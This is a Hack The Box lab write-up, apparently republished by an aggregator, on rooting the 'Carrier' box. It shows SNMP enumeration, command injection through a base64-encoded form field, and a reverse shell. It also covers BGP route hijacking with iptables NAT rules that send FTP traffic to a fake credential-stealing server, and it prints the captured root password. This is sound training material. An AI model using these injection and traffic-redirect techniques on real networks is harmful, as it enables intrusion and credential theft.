70

Hack The Box - Carrier

 3 years ago
source link: https://www.tuicool.com/articles/hit/BvEJZb7
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

Quick Summary

Hey guys today Carrier retired and here is my write-up about it. User on this box wasn’t hard to get , but for root it’s a different thing because we will go through some networking tricks and we will perform an attack called bgp hijacking. The overall experience was great and carrier was one of the best boxes on this platfrom. It’s a linux box and its ip is 10.10.10.105 I added it to /etc/hosts as carrier.htb . Let’s jump right in !

JriuemA.png!web

Nmap

As always we will start by using nmap to scan for open ports and services.

nmap -sV -sT -sC carrier.htb ANR7v26.png!web

We get ftp on port 21 , ssh on port 22 and http on port 80. Some other boxes had anonymous ftp access allowed but here it’s not allowed , also the port is filtered so we are not going to check ftp.

HTTP Initial Enumeration

BR3q6rR.png!web

On http there’s a web application called Lyghtspeed and we are asked to login. Under “Please login” we see that it’s saying Error 45007 and Error 45009 which is interesting.

Next thing to check is sub directories enumeration :

gobuster -u http://carrier.htb/ -w /usr/share/wordlists/dirb/common.txt -t 100 -to 200s

=====================================================
Gobuster v2.0.0              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://carrier.htb/
[+] Threads      : 100
[+] Wordlist     : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 3m20s
=====================================================
2019/03/15 11:50:56 Starting gobuster
=====================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/css (Status: 301)
/debug (Status: 301)
/doc (Status: 301)
/fonts (Status: 301)
/img (Status: 301)
/index.php (Status: 200)
/js (Status: 301)
/server-status (Status: 403)
/tools (Status: 301)

We will only check interesting ones :

/tools :

AnyqYzB.png!web

It has a php file called remote.php and by checking it :

fMvEJfU.png!web

It says “License expired, exiting…”

/debug :

RfU32ef.png!web

It’s just phpinfo page

/doc :

ie2IZjV.png!web

There’s a pdf file and an image , the pdf file is called error_codes.pdf so it might be helpful because we saw earlier two errors on the login page.

zaqm6fy.png!webFbIrMbi.png!web

Error 45007 is “License invalid or expired”

Error 45009 is “System credentials have not been set. Default admin user password is set (see chassis serial number)”

So now we know that we need that serial number to be able to login , but how to get it ?

More nmap

At this point we may think that there are other services running on the box and we have missed them. So before running a full tcp scan we will scan udp first.

nmap -sU carrier.htb 3iMZRfJ.png!web

We get dhcps on port 67 and snmp on port 161. Let’s check snmp.

Snmp Enumeration

Snmp stands for Simple Network Management Protocols and it’s an Internet Standard protocol for collecting and organizing information about managed devices on IP networks and for modifying that information to change device behavior. you can read more about it here

We will use a tool called snmpwalk , it’s an important tool in snmp enumeration and can tell us a lot of useful information. Read about snmpwalk here

snmpwalk -c public -v 1 carrier.htb

-c for community string , -v for version

fM3uYbQ.png!web

We only get one result STRING: "SN#NET_45JDX23" so is that the serial number ? Let’s check

admin : NET_45JDX23 yQ7bqii.png!webyA3UFbq.png!web

And it worked.

Exploiting RCE and getting user

Dashboard , Tickets and Diagnostics are available. But Monitoring is disabled. Tickets are not important now but we will need them later.

NnIV7nM.png!webbMry6ni.png!web

Diagnostics has a button saying verify status :

mMbyiuR.png!web

After clicking :

IZvIfar.png!web

By looking at the source we find a hidden field called check , also if we used burp to intercept the requests we will find it. The value of check is base64 encoded string of “quagga” :

via2qez.png!webUNF7zqe.png!web

We can try to encode “root” and see what happens :

3UBniaR.png!web

It gives us a different output :

yiEzEvE.png!web

We can confirm that we have remote code execution by trying something like “quagga && whoami && id”

aymimqz.png!webe67jU3j.png!web

And we see root , we can easily encode our reverse shell payload and get a reverse shell :

bMJBzeJ.png!webrIFRZzF.png!web

But did we really get root access ? ifconfig and we see that we are not on the actual host which is 10.10.10.105 , we are on a different one.

r6ZZRn7.png!web36vumai.png!web

Anyway we owned the user flag !

I also wrote a python script to automate the process of getting a reverse shell , I’ll post it later.

Bgp Hijacking and getting root

We saw “quagga” mentioned in the diagnostics page , but what is quagga ?

Basically quagga is a routing software and since quagga is installed on this host then most likely we are going to perform bgp-hijacking or route-hijacking. I won’t go through a detailed explanation about this attack because that will be off-topic , I will include some resources. In simple words we are going to hijack another network prefixes and announce them to us , so if anybody tried to connect to that network they will connect to us. This is possible because we are on the host that is responsible for routing.

Read about quagga

Bgp Hijacking (wikipedia)

Bgp Hijacking (internetsociety.org)

Bgp Hijacking demo

Bgp Hijacking (blogs.akamai.com)

If we take a look at the tickets again , ticket number 6 :

bMry6ni.png!web

We will notice this line : “one of their VIP is having issues connecting by FTP to an important server in the 10.120.15.0/24 network” , so on 10.120.15.0 there’s an FTP server and someone is accessing it regularly , on github there’s a python script called fake_ftp which creates an FTP server that steals credentials. We can try it locally with test:test :

YRziMjj.png!webiYreuiV.png!web

Now everything is ready , we just need to hijack 10.120.15.0 then run that fake ftp on the host and we will be able to steal credentials , but the script is written in python 2.7 and this host has only python 3 installed :

FNjEje2.png!web

We can fake an FTP server with nc or edit the script to work with python3 , but we will do something different , we will edit iptables rules to route traffic from port 21 on the host to port 21 on our box , so what will finally happen is :

Someone tries to connect to the ftp server –> connects to the router instead of the server –> iptables routes that traffic to our box –> our fake ftp server steals the credentials

in order to perform our attack we will edit bgpd.conf in /etc/quagga

Original :

meayman.png!web

After edits :

7vuaqaF.png!web

The only difference is this line network 10.120.15.0/25

Now we will run a python simple http server to host the new bgpd.conf :

pythom -m SimpleHTTPServer 80

Then we will delete the old one , download the new conf, edit iptables rules and finally restart the service :

7fqqqa6.png!web

iptables commands :

iptables -t nat -A PREROUTING -p tcp --dport 21 -j DNAT --to-destination 10.10.xx.xx:21 iptables -t nat -A POSTROUTING -j MASQUERADE

Then we will wait for someone to access the fake ftp server

watch cat log.txt this will do cat log.txt and refresh it every 2 seconds (log.txt is where the captured credentials are stored) :

6ZrqAj3.png!web

Finally we get these credentials :

root:BGPtelc0rout1ng

Now we can ssh to the actual box as root :

ZvMBRfM.png!web

And we owned root !

That’s it , Feedback is appreciated !

Don’t forget to read theprevious write-ups , Tweet about the write-up if you liked it , follow on twitter for awesome resources @Ahm3d_H3sham

Thanks for reading.

Previous Hack The Box write-up : Hack The Box - Ethereal


About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK